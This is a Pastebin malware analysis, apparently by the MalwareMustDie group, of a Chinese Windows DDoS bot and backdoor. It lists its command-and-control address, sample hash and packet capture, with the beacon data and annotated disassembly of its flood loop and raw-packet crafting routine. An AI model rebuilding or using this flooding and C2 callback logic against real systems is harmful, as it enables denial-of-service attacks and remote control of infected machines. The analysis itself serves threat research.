API tools faq
paste
Advertisement
MalwareMustDie

China Windows DDoSer w/USA CNC 23.91.3.246

MalwareMustDie
Oct 5th, 2014
2,280
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 19.27 KB | None | 0 0
raw download clone embed print report
  1. #MalwareMustDie! Chinese windows version DDOSer & Backdoor.
  2. CNC: 23.91.3.246 AS40676 | US | PSYCHZ.NET | PSYCHZ NETWORKS
  3.  
  4. Sample: 0fc1a56432130509333542eec91527df6365743e754c468292f2a039f2606d9a
  5. VT: https://www.virustotal.com/en/file/0fc1a56432130509333542eec91527df6365743e754c468292f2a039f2606d9a/analysis/1409374344/
  6. Announce:
  7. https://twitter.com/MalwareMustDie/status/518672140896182272
  8. https://twitter.com/ochsenmeier/status/518680214566862848
  9.  
  10. Verdicts:
  11.  
  12. // ========================================
  13. // Backdoor to jiu40.mydns.iego.net (23.91.3.246)
  14. // Loc: 23.91.3.246|unassigned.psychz.net.|40676 | 23.91.0.0/19 | AS40676 | US | PSYCHZ.NET | PSYCHZ NETWORKS
  15. //
  16. // ========================================
  17.  
  18. Pic Callback PoC: https://lh3.googleusercontent.com/-h5oOSXeoH_I/VDD3G-tXC9I/AAAAAAAARMw/b2zW6XcD7bM/h1900/00011.png
  19. 1   0.000000   x.x.x.x   y.y.y.y   DNS   80   Standard query 0x7084  A jiu40.mydns.iego.net
  20. 2   0.631257   y.y.y.y   x.x.x.x   DNS   96   Standard query response 0x7084  A 23.91.3.246
  21. 3   0.634134   x.x.x.x   23.91.3.246   TCP   62   2105443 [SYN] Seq=0 Win=65535 Len=0 MSS=1460 SACK_PERM=1
  22. 4   0.634166   23.91.3.246   x.x.x.x   TCP   62   4432105 [SYN, ACK] Seq=0 Ack=1 Win=14600 Len=0 MSS=1460 SACK_PERM=1
  23. 5   0.634457   x.x.x.x   23.91.3.246   TCP   60   2105443 [ACK] Seq=1 Ack=1 Win=65535 Len=0
  24. 6   0.638676   x.x.x.x   23.91.3.246   SSL   1514   Continuation Data
  25.  
  26. Sent data:
  27. 00000000  01 00 00 00 27 24 20 20  51 52 53 57 51 56 20 20 ....*$   QRSWQV  
  28. 00000010  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20                  
  29. 00000020  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20                  
  30. 00000030  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20                  
  31. 00000040  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20                  
  32. 00000050  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20                  
  33. 00000060  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20                  
  34. 00000070  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20                  
  35. 00000080  20 20 20 20 20 20 20 20  77 89 8e 84 8f 97 93 40          w......@
  36. 00000090  78 70 20 20 20 20 20 20  20 20 20 20 20 20 20 20 xp    // <=== OS version
  37. 000000A0  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20                  
  38. 000000B0  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20                  
  39. 000000C0  20 20 20 20 20 20 20 20  52 50 50 56 40 20 20 20          RPPV@  
  40. 000000D0  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20                  
  41. 000000E0  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20                  
  42. 000000F0  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20                  
  43. 00000100  20 20 20 20 20 20 20 20  52 50 51 54 4e 58 4e 52          RPQTNXNR
  44. 00000110  57 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20 W                
  45. 00000120  20 20 20 20 20 20 20 20  5d 2d 20 20 20 20 20 20          ]-      
  46.  
  47. // ========================================
  48. // DDoS PoC:
  49. // ========================================
  50. 0x04013C0    sub     esp, 0A30h
  51. 0x04013C6    push    esi
  52. 0x04013C7    mov     esi, [esp+0A34h+arg_0]
  53. 0x04013CE    push    edi
  54. 0x04013CF    lea     eax, [esp+0A38h+WSAData]
  55. 0x04013D6    mov     ecx, 24h
  56. 0x04013DB    lea     edi, [esp+0A38h+cp]
  57. 0x04013DF    push    eax             // lpWSAData
  58. 0x04013E0    push    202h            // wVersionRequested
  59. 0x04013E5    rep movsd
  60. 0x04013E7    call    ds:WSAStartup
  61. 0x04013ED    xor     ecx, ecx
  62. 0x04013EF    mov     edx, dword ptr [esp+0A38h+hostshort]
  63. 0x04013F6    mov     dword ptr [esp+0A38h+name.sa_family], ecx
  64. 0x04013FA    mov     dword ptr [esp+0A38h+name.sa_data+2], ecx
  65. 0x04013FE    push    edx             // hostshort
  66. 0x04013FF    mov     dword ptr [esp+0A3Ch+name.sa_data+6], ecx
  67. 0x0401403    mov     [esp+0A3Ch+name.sa_family], 2
  68. 0x040140A    mov     dword ptr [esp+0A3Ch+name.sa_data+0Ah], ecx
  69. 0x040140E    call    ds:htons
  70. 0x0401414    mov     word ptr [esp+0A38h+name.sa_data], ax
  71. 0x0401419    lea     eax, [esp+0A38h+cp]
  72. 0x040141D    push    eax             // cp
  73. 0x040141E    call    sub_0x0401160
  74. 0x0401423    add     esp, 4
  75. 0x0401426    mov     dword ptr [esp+0A38h+name.sa_data+2], eax
  76. 0x040142A    push    6               // protocol
  77. 0x040142C    push    1               // type
  78. 0x040142E    push    2               // af
  79. 0x0401430    call    ds:socket
  80. 0x0401436    lea     ecx, [esp+0A38h+name]
  81. 0x040143A    mov     esi, eax
  82. 0x040143C    push    10h             // namelen
  83. 0x040143E    push    ecx             // name
  84. 0x040143F    push    esi             // s
  85. 0x0401440    call    ds:connect
  86. 0x0401446    cmp     eax, 0FFFFFFFFh
  87. 0x0401449    jnz     short loc_0x0401462
  88. 0x040144B    push    esi             // s
  89. 0x040144C    call    ds:closesocket
  90. 0x0401452    pop     edi
  91. 0x0401453    mov     eax, 1
  92. 0x0401458    pop     esi
  93. 0x0401459    add     esp, 0A30h
  94. 0x040145F    retn    4
  95. 0x0401462 //
  96. 0x0401462
  97. 0x0401462 loc_0x0401462:                // xref: sub_0x04013C0+89
  98. 0x0401462    push    ebx
  99. 0x0401463    push    ebp
  100. 0x0401464    mov     ebp, ds:send
  101. 0x040146A
  102. 0x040146A loc_0x040146A:                // xref: sub_0x04013C0+10F
  103. 0x040146A    push    400h
  104. 0x040146F    call    sub_0x04010E0
  105. 0x0401474    mov     ebx, eax
  106. 0x0401476    push    1Ah
  107. 0x0401478    add     ebx, 400h
  108. 0x040147E    call    sub_0x04010E0
  109. 0x0401483    add     eax, 61h
  110. 0x0401486    mov     ecx, ebx
  111. 0x0401488    mov     bl, al
  112. 0x040148A    mov     edx, ecx
  113. 0x040148C    mov     bh, bl
  114. 0x040148E    lea     edi, [esp+0A48h+buf]
  115. 0x0401495    mov     eax, ebx
  116. 0x0401497    add     esp, 8
  117. 0x040149A    shl     eax, 10h
  118. 0x040149D    mov     ax, bx
  119. 0x04014A0    shr     ecx, 2
  120. 0x04014A3    rep stosd
  121. 0x04014A5    mov     ecx, edx
  122. 0x04014A7    and     ecx, 3
  123. 0x04014AA    rep stosb
  124. 0x04014AC    cmp     dword_0x04110A0, 1
  125. 0x04014B3    jz      short loc_0x04014D1
  126. 0x04014B5    push    0               // flags
  127. 0x04014B7    lea     eax, [esp+0A44h+buf]
  128. 0x04014BE    push    800h            // len
  129. 0x04014C3    push    eax             // buf
  130. 0x04014C4    push    esi             // s
  131. 0x04014C5    call    ebp // send
  132. 0x04014C7    push    0Ah             // dwMilliseconds
  133. 0x04014C9    call    ds:Sleep
  134. 0x04014CF    jmp     short loc_0x040146A
  135. 0x04014D1 //
  136. 0x04014D1
  137. 0x04014D1 loc_0x04014D1:                // xref: sub_0x04013C0+F3
  138. 0x04014D1    push    esi             // s
  139. 0x04014D2    call    ds:closesocket
  140. 0x04014D8    mov     ecx, dword_0x0413E14
  141. 0x04014DE    push    0               // dwExitCode
  142. 0x04014E0    push    ecx             // hThread
  143. 0x04014E1    call    ds:TerminateThread // forking stops..dunno what they call this in windozz.
  144. 0x04014E7    pop     ebp
  145. 0x04014E8    pop     ebx
  146. 0x04014E9    pop     edi
  147. 0x04014EA    mov     dword_0x0413E14, 0
  148. 0x04014F4    xor     eax, eax
  149. 0x04014F6    pop     esi
  150. 0x04014F7    add     esp, 0A30h
  151. 0x04014FD    retn    4
  152.  
  153. // ========================================
  154. // Scanner PoC, A lame .NET bruters..
  155. // ========================================
  156.  
  157. 0x0401500    push    ebp
  158. 0x0401501    mov     ebp, esp
  159. 0x0401503    push    0FFFFFFFFh
  160. 0x0401505    push    offset unknown_libname_31 // Microsoft VisualC 210/net runtime
  161. 0x040150A    mov     eax, large fs:0
  162. 0x0401510    push    eax
  163. 0x0401511    mov     large fs:0, esp
  164. 0x0401518    sub     esp, 168h
  165. 0x040151E    push    ebx
  166. 0x040151F    push    esi
  167. 0x0401520    mov     esi, [ebp+arg_0]
  168. 0x0401523    push    edi
  169. 0x0401524    mov     [ebp+var_10], esp
  170. 0x0401527    xor     ebx, ebx
  171. 0x0401529    mov     ecx, 24h
  172. 0x040152E    lea     edi, [ebp+var_174]
  173. 0x0401534    push    1               // dwFlags
  174. 0x0401536    push    ebx             // g
  175. 0x0401537    rep movsd
  176. 0x0401539    push    ebx             // lpProtocolInfo
  177. 0x040153A    push    0FFh            // protocol
  178. 0x040153F    mov     cl, 31h
  179. 0x0401541    mov     al, 2Eh
  180. 0x0401543    mov     dl, 38h
  181. 0x0401545    push    3               // type
  182. 0x0401547    push    2               // af
  183. 0x0401549    mov     [ebp+cp], cl
  184. 0x040154C    mov     [ebp+var_1B], 39h
  185. 0x0401550    mov     [ebp+var_1A], 32h
  186. 0x0401554    mov     [ebp+var_19], al
  187. 0x0401557    mov     [ebp+var_18], cl
  188. 0x040155A    mov     [ebp+var_17], 36h
  189. 0x040155E    mov     [ebp+var_16], dl
  190. 0x0401561    mov     [ebp+var_15], al
  191. 0x0401564    mov     [ebp+var_14], cl
  192. 0x0401567    mov     [ebp+var_13], al
  193. 0x040156A    mov     [ebp+var_12], dl
  194. 0x040156D    mov     [ebp+var_11], bl
  195. 0x0401570    call    ds:WSASocketA
  196. 0x0401576    cmp     eax, 0FFFFFFFFh
  197. 0x0401579    mov     [ebp+s], eax
  198. 0x040157C    jz      0x0401687
  199. 0x0401582    mov     eax, dword ptr [ebp+hostshort]
  200. 0x0401588    mov     esi, ds:htons
  201. 0x040158E    push    eax             // hostshort
  202. 0x040158F    mov     [ebp+to.sa_family], 2
  203. 0x0401595    call    esi // htons
  204. 0x0401597    lea     ecx, [ebp+var_174]
  205. 0x040159D    mov     word ptr [ebp+to.sa_data], ax
  206. 0x04015A1    push    ecx             // cp
  207. 0x04015A2    call    sub_0x0401160
  208. 0x04015A7    add     esp, 4
  209. 0x04015AA    mov     dword ptr [ebp+to.sa_data+2], eax
  210. 0x04015AD    mov     [ebp+var_30], 45h
  211. 0x04015B1    mov     [ebp+var_2F], bl
  212. 0x04015B4    push    28h             // hostshort
  213. 0x04015B6    call    esi // htons
  214. 0x04015B8    push    100h
  215. 0x04015BD    mov     [ebp+var_2E], ax
  216. 0x04015C1    mov     [ebp+var_2C], 1
  217. 0x04015C7    mov     [ebp+var_2A], 40h
  218. 0x04015CD    call    sub_0x04010E0
  219. 0x04015D2    add     esp, 4
  220. 0x04015D5    lea     edx, [ebp+cp]
  221. 0x04015D8    mov     [ebp+var_28], al
  222. 0x04015DB    mov     [ebp+var_27], 6
  223. 0x04015DF    push    edx             // cp
  224. 0x04015E0    mov     [ebp+var_26], bx
  225. 0x04015E4    call    ds:inet_addr
  226. 0x04015EA    mov     edi, eax
  227. 0x04015EC    lea     eax, [ebp+var_174]
  228. 0x04015F2    push    eax             // cp
  229. 0x04015F3    call    sub_0x0401160
  230. 0x04015F8    push    0EA60h
  231. 0x04015FD    mov     [ebp+var_20], eax
  232. 0x0401600    call    sub_0x04010E0
  233. 0x0401605    add     esp, 8
  234. 0x0401608    inc     eax
  235. 0x0401609    push    eax             // hostshort
  236. 0x040160A    call    esi // htons
  237. 0x040160C    mov     ecx, dword ptr [ebp+hostshort]
  238. 0x0401612    mov     [ebp+var_0x044], ax
  239. 0x0401616    push    ecx             // hostshort
  240. 0x0401617    call    esi // htons
  241. 0x0401619    push    35A4E900h
  242. 0x040161E    mov     [ebp+var_0x042], ax
  243. 0x0401622    call    sub_0x04010E0
  244. 0x0401627    add     esp, 4
  245. 0x040162A    inc     eax
  246. 0x040162B    push    eax             // hostlong
  247. 0x040162C    call    ds:htonl
  248. 0x0401632    push    200h            // hostshort
  249. 0x0401637    mov     [ebp+var_0x040], eax
  250. 0x040163A    mov     [ebp+var_3C], ebx
  251. 0x040163D    mov     [ebp+var_38], 50h
  252. 0x0401641    mov     [ebp+var_37], 2
  253. 0x0401645    call    esi // htons
  254. 0x0401647    mov     edx, [ebp+var_20]
  255. 0x040164A    push    14h             // hostshort
  256. 0x040164C    mov     [ebp+var_36], ax
  257. 0x0401650    mov     [ebp+var_34], bx
  258. 0x0401654    mov     [ebp+var_32], bx
  259. 0x0401658    mov     [ebp+var_50], edi
  260. 0x040165B    mov     [ebp+var_0x04C], edx
  261. 0x040165E    mov     byte ptr [ebp+var_0x048], bl
  262. 0x0401661    mov     byte ptr [ebp+var_0x048+1], 6
  263. 0x0401665    call    esi // htons
  264. 0x0401667    mov     word ptr [ebp+var_0x048+2], ax
  265. 0x040166B
  266. 0x040166B 0x040166B:                // xref: StartAddress+407
  267. 0x040166B    cmp     dword_0x04110A0, 1
  268. 0x0401672    jnz     short 0x040169C
  269. 0x0401674    mov     eax, dword_0x0413E10
  270. 0x0401679    push    ebx             // dwExitCode
  271. 0x040167A    push    eax             // hThread
  272. 0x040167B    call    ds:TerminateThread
  273. 0x0401681    mov     dword_0x0413E10, ebx
  274. 0x0401687
  275. 0x0401687 0x0401687:                // xref: StartAddress+7C
  276. 0x0401687    mov     ecx, [ebp+var_C]
  277. 0x040168A    pop     edi
  278. 0x040168B    pop     esi
  279. 0x040168C    xor     eax, eax
  280. 0x040168E    mov     large fs:0, ecx
  281. 0x0401695    pop     ebx
  282. 0x0401696    mov     esp, ebp
  283. 0x0401698    pop     ebp
  284. 0x0401699    retn    4
  285. 0x040169C //
  286. 0x040169C
  287. 0x040169C 0x040169C:                // xref: StartAddress+172
  288. 0x040169C    mov     [ebp+arg_0], ebx
  289. 0x040169F
  290. 0x040169F 0x040169F:                // xref: StartAddress+3FA
  291. 0x040169F    cmp     [ebp+arg_0], 0Fh
  292. 0x04016A3    jge     0x04018FF
  293. 0x04016A9    push    0FAh
  294. 0x04016AE    call    sub_0x04010E0
  295. 0x04016B3    add     esp, 4
  296. 0x04016B6    inc     eax
  297. 0x04016B7    push    eax
  298. 0x04016B8    push    0FAh
  299. 0x04016BD    call    sub_0x04010E0
  300. 0x04016C2    add     esp, 4
  301. 0x04016C5    inc     eax
  302. 0x04016C6    push    eax
  303. 0x04016C7    push    0FAh
  304. 0x04016CC    call    sub_0x04010E0
  305. 0x04016D1    add     esp, 4
  306. 0x04016D4    inc     eax
  307. 0x04016D5    push    eax
  308. 0x04016D6    push    0FAh
  309. 0x04016DB    call    sub_0x04010E0
  310. 0x04016E0    add     esp, 4
  311. 0x04016E3    inc     eax
  312. 0x04016E4    lea     ecx, [ebp+cp]
  313. 0x04016E7    push    eax
  314. 0x04016E8    push    offset aD_D_D_D // "%d.%d.%d.%d"
  315. 0x04016ED    push    ecx             // LPSTR
  316. 0x04016EE    call    wsprintfA
  317. 0x04016F4    push    100h
  318. 0x04016F9    mov     [ebp+var_26], bx
  319. 0x04016FD    call    sub_0x04010E0
  320. 0x0401702    add     esp, 1Ch
  321. 0x0401705    lea     edx, [ebp+cp]
  322. 0x0401708    mov     [ebp+var_28], al
  323. 0x040170B    push    edx             // cp
  324. 0x040170C    call    ds:inet_addr
  325. 0x0401712    mov     edi, eax
  326. 0x0401714    push    0EA60h
  327. 0x0401719    mov     [ebp+var_24], edi
  328. 0x040171C    mov     [ebp+var_34], bx
  329. 0x0401720    call    sub_0x04010E0
  330. 0x0401725    add     esp, 4
  331. 0x0401728    inc     eax
  332. 0x0401729    push    eax             // hostshort
  333. 0x040172A    call    esi // htons
  334. 0x040172C    push    35A4E900h
  335. 0x0401731    mov     [ebp+var_0x044], ax
  336. 0x0401735    call    sub_0x04010E0
  337. 0x040173A    add     esp, 4
  338. 0x040173D    inc     eax
  339. 0x040173E    push    eax             // hostlong
  340. 0x040173F    call    ds:htonl
  341. 0x0401745    mov     [ebp+var_0x040], eax
  342. 0x0401748    lea     eax, [ebp+var_64]
  343. 0x040174B    push    offset unk_0x040FE08
  344. 0x0401750    push    eax
  345. 0x0401751    mov     [ebp+var_50], edi
  346. 0x0401754    mov     [ebp+var_0x04], ebx
  347. 0x0401757    mov     [ebp+var_64], 32h
  348. 0x040175E    call    __CxxThrowException@8 // _CxxThrowException(x,x)
  349. 0x0401763 //
  350. 0x0401763
  351. 0x0401763 0x0401763:                // xref: .rdata:stru_0x040FFC0
  352. 0x0401763    mov     eax, offset 0x0401769
  353. 0x0401768    retn
  354. 0x0401769 //
  355. 0x0401769
  356. 0x0401769 0x0401769:                // xref: StartAddress:0x0401763
  357. 0x0401769    lea     ecx, [ebp+var_5C]
  358. 0x040176C    push    offset unk_0x040FE08
  359. 0x0401771    push    ecx
  360. 0x0401772    mov     [ebp+var_0x04], 2
  361. 0x0401779    mov     [ebp+var_5C], 25Dh
  362. 0x0401780    call    __CxxThrowException@8 // _CxxThrowException(x,x)
  363. 0x0401785 //
  364. 0x0401785
  365. 0x0401785 0x0401785:                // xref: .rdata:stru_0x040FFD0
  366. 0x0401785    mov     eax, offset 0x040178B
  367. 0x040178A    retn
  368. 0x040178B //
  369. 0x040178B
  370. 0x040178B 0x040178B:                // xref: StartAddress:0x0401785
  371. 0x040178B    lea     edx, [ebp+var_58]
  372. 0x040178E    push    offset unk_0x040FE08
  373. 0x0401793    push    edx
  374. 0x0401794    mov     [ebp+var_0x04], 4
  375. 0x040179B    mov     [ebp+var_58], 30Ch
  376. 0x04017A2    call    __CxxThrowException@8 // _CxxThrowException(x,x)
  377. 0x04017A7 //
  378. 0x04017A7
  379. 0x04017A7 0x04017A7:                // xref: .rdata:stru_0x040FFE0
  380. 0x04017A7    mov     eax, offset 0x04017AD
  381. 0x04017AC    retn
  382. 0x04017AD //
  383. 0x04017AD
  384. 0x04017AD 0x04017AD:                // xref: StartAddress:0x04017A7
  385. 0x04017AD    mov     eax, [ebp+var_50]
  386. 0x04017B0    mov     ecx, [ebp+var_0x04C]
  387. 0x04017B3    mov     edx, [ebp+var_0x048]
  388. 0x04017B6    mov     dword ptr [ebp+buf], eax
  389. 0x04017BC    lea     eax, [ebp+var_70]
  390. 0x04017BF    push    offset unk_0x040FE08
  391. 0x04017C4    push    eax
  392. 0x04017C5    mov     [ebp+var_E0], ecx
  393. 0x04017CB    mov     [ebp+var_DC], edx
  394. 0x04017D1    mov     [ebp+var_0x04], 6
  395. 0x04017D8    mov     [ebp+var_70], 4Eh
  396. 0x04017DF    call    __CxxThrowException@8 // _CxxThrowException(x,x)
  397. 0x04017E4 //
  398. 0x04017E4
  399. 0x04017E4 0x04017E4:                // xref: .rdata:stru_0x040FFF0
  400. 0x04017E4    mov     eax, offset 0x04017EA
  401. 0x04017E9    retn
  402. 0x04017EA //
  403. 0x04017EA
  404. 0x04017EA 0x04017EA:                // xref: StartAddress:0x04017E4
  405. 0x04017EA    mov     ecx, 5
  406. 0x04017EF    lea     esi, [ebp+var_0x044]
  407. 0x04017F2    lea     edi, [ebp+var_D8]
  408. 0x04017F8    push    20h
  409. 0x04017FA    rep movsd
  410. 0x04017FC    lea     ecx, [ebp+buf]
  411. 0x0401802    push    ecx
  412. 0x0401803    call    sub_0x0401000
  413. 0x0401808    add     esp, 8
  414. 0x040180B    lea     edx, [ebp+var_6C]
  415. 0x040180E    mov     [ebp+var_34], ax
  416. 0x0401812    mov     [ebp+var_0x04], 8
  417. 0x0401819    push    offset unk_0x040FE08
  418. 0x040181E    push    edx
  419. 0x040181F    mov     [ebp+var_6C], 293h
  420. 0x0401826    call    __CxxThrowException@8 // _CxxThrowException(x,x)
  421. 0x040182B //
  422. 0x040182B
  423. 0x040182B 0x040182B:                // xref: .rdata:stru_0x0410000
  424. 0x040182B    mov     eax, offset 0x0401831
  425. 0x0401830    retn
  426. 0x0401831 //
  427. 0x0401831
  428. 0x0401831 0x0401831:                // xref: StartAddress:0x040182B
  429. 0x0401831    mov     ecx, 5
  430. 0x0401836    lea     esi, [ebp+var_30]
  431. 0x0401839    lea     edi, [ebp+buf]
  432. 0x040183F    lea     eax, [ebp+var_60]
  433. 0x0401842    push    offset unk_0x040FE08
  434. 0x0401847    push    eax
  435. 0x0401848    rep movsd
  436. 0x040184A    mov     [ebp+var_0x04], 0Ah
  437. 0x0401851    mov     [ebp+var_60], 0D2h
  438. 0x0401858    call    __CxxThrowException@8 // _CxxThrowException(x,x)
  439. 0x040185D //
  440. 0x040185D
  441. 0x040185D 0x040185D:                // xref: .rdata:stru_0x0410010
  442. 0x040185D    mov     eax, offset 0x0401863
  443. 0x0401862    retn
  444. 0x0401863 //
  445. 0x0401863
  446. 0x0401863 0x0401863:                // xref: StartAddress:0x040185D
  447. 0x0401863    mov     ecx, 5
  448. 0x0401868    lea     esi, [ebp+var_0x044]
  449. 0x040186B    lea     edi, [ebp+var_D0]
  450. 0x0401871    push    28h
  451. 0x0401873    rep movsd
  452. 0x0401875    lea     ecx, [ebp+buf]
  453. 0x040187B    push    ecx
  454. 0x040187C    call    sub_0x0401000
  455. 0x0401881    add     esp, 8
  456. 0x0401884    lea     edx, [ebp+var_68]
  457. 0x0401887    mov     [ebp+var_26], ax
  458. 0x040188B    mov     [ebp+var_0x04], 0Ch
  459. 0x0401892    push    offset unk_0x040FE08
  460. 0x0401897    push    edx
  461. 0x0401898    mov     [ebp+var_68], 1C2h
  462. 0x040189F    call    __CxxThrowException@8 // _CxxThrowException(x,x)
  463. 0x04018A4 //
  464. 0x04018A4
  465. 0x04018A4 0x04018A4:                // xref: .rdata:stru_0x0410020
  466. 0x04018A4    mov     eax, offset 0x04018AA
  467. 0x04018A9    retn
  468. 0x04018AA //
  469. 0x04018AA
  470. 0x04018AA 0x04018AA:                // xref: StartAddress:0x04018A4
  471. 0x04018AA    mov     ecx, 5
  472. 0x04018AF    lea     esi, [ebp+var_30]
  473. 0x04018B2    lea     edi, [ebp+buf]
  474. 0x04018B8    mov     edx, [ebp+s]
  475. 0x04018BB    rep movsd
  476. 0x04018BD    mov     ecx, 5
  477. 0x04018C2    lea     esi, [ebp+var_0x044]
  478. 0x04018C5    lea     edi, [ebp+var_D0]
  479. 0x04018CB    lea     eax, [ebp+to]
  480. 0x04018CE    rep movsd
  481. 0x04018D0    push    10h             // tolen
  482. 0x04018D2    xor     ebx, ebx
  483. 0x04018D4    push    eax             // to
  484. 0x04018D5    push    ebx             // flags
  485. 0x04018D6    lea     ecx, [ebp+buf]
  486. 0x04018DC    push    28h             // len
  487. 0x04018DE    push    ecx             // buf
  488. 0x04018DF    push    edx             // s
  489. 0x04018E0    mov     [ebp+var_0x04], 0FFFFFFFFh
  490. 0x04018E7    call    ds:sendto
  491. 0x04018ED    mov     eax, [ebp+arg_0]
  492. 0x04018F0    mov     esi, ds:htons
  493. 0x04018F6    inc     eax
  494. 0x04018F7    mov     [ebp+arg_0], eax
  495. 0x04018FA    jmp     0x040169F
  496. 0x04018FF
  497. 0x04018FF 0x04018FF:                // xref: StartAddress+1A3
  498. 0x04018FF    push    0Ah             // dwMilliseconds
  499. 0x0401901    call    ds:Sleep
  500. 0x0401907    jmp     0x040166B
  501.  
  502. ----
  503. #MalwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!